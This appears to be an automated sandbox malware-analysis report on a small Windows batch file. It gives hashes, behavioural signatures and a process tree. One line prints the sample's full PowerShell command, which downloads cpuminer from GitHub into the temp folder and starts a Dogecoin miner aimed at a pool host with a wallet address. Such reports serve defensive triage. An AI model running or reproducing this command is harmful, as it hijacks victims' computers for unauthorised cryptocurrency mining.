Analysis
  max time kernel: 1796s
  max time network: 1807s
  platform: windows10-2004_x64
  resource: win10v2004-20231215-ja
  resource tags: arch:x64, arch:x86, image:win10v2004-20231215-ja, locale:ja-jp, os:windows10-2004-x64, system, windows
  submitted: 03/02/2024, 10:59
Static task: static1
Behavioral task: behavioral1
  Sample: 73u3Ito.bat
  Resource: win10-20231215-ja
Behavioral task: behavioral2
  Sample: 73u3Ito.bat
  Resource: win10v2004-20231215-ja
General
  Target: 73u3Ito.bat
  Size: 499B
  MD5: fe74bff27516829a88cfbc6f6e99646f
  SHA1: 0c15d859211c79910b277d07e729bec7197a60cd
  SHA256: b1f312f139949cac20d0591831ce57c227c6ac77ebd98edfcdafa5c0b02cd2bb
  SHA512: a94dbaef073e7b62ff9827887f1da6837103316c5656719b176ba1c2a063066f5f159b8ca783208db629121beea33fb81a94b9e6f4f4ec2612ee923639947a98
Malware Config
Signatures
  Blocklisted process makes network request (2 IoCs)
    flow  pid  Process
    8     928  powershell.exe
    10    928  powershell.exe
  Executes dropped EXE (1 IoC)
    pid  Process
    460  cpuminer-sse2.exe
  Loads dropped DLL (5 IoCs)
    pid  Process
    460  cpuminer-sse2.exe
    460  cpuminer-sse2.exe
    460  cpuminer-sse2.exe
    460  cpuminer-sse2.exe
    460  cpuminer-sse2.exe
  Suspicious behavior: EnumeratesProcesses (2 IoCs)
    pid  Process
    928  powershell.exe
    928  powershell.exe
  Suspicious use of AdjustPrivilegeToken (1 IoC)
    description               pid  Process
    Token: SeDebugPrivilege   928  powershell.exe
  Suspicious use of WriteProcessMemory (6 IoCs)
    description                          pid   Process          procid_target
    PID 776 wrote to memory of 928       776   cmd.exe          84
    PID 776 wrote to memory of 928       776   cmd.exe          84
    PID 928 wrote to memory of 2284      928   powershell.exe   92
    PID 928 wrote to memory of 2284      928   powershell.exe   92
    PID 2284 wrote to memory of 460      2284  cmd.exe          94
    PID 2284 wrote to memory of 460      2284  cmd.exe          94
Processes
  [1] C:\Windows\system32\cmd.exe
      Command line: C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\73u3Ito.bat"
      PID: 776
      - Suspicious use of WriteProcessMemory
    [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Command line: powershell.exe -Command "Invoke-WebRequest -Uri 'https://github.com/JayDDee/cpuminer-opt/releases/download/v23.15/cpuminer-opt-23.15-windows.zip' -OutFile "$env:TEMP\cpuminer.zip"; Expand-Archive -Path "$env:TEMP\cpuminer.zip" -DestinationPath "$env:TEMP\cpuminer"; Set-Location -Path "$env:TEMP\cpuminer"; Start-Process -FilePath 'cmd.exe' -ArgumentList '/k', 'cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.na.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 2'"
        PID: 928
        - Blocklisted process makes network request
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of WriteProcessMemory
      [3] C:\Windows\system32\cmd.exe
          Command line: "C:\Windows\system32\cmd.exe" /k cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.na.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 2
          PID: 2284
          - Suspicious use of WriteProcessMemory
        [4] C:\Users\Admin\AppData\Local\Temp\cpuminer\cpuminer-sse2.exe
            Command line: cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.na.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 2
            PID: 460
            - Executes dropped EXE
            - Loads dropped DLL
Network
MITRE ATT&CK Matrix
Downloads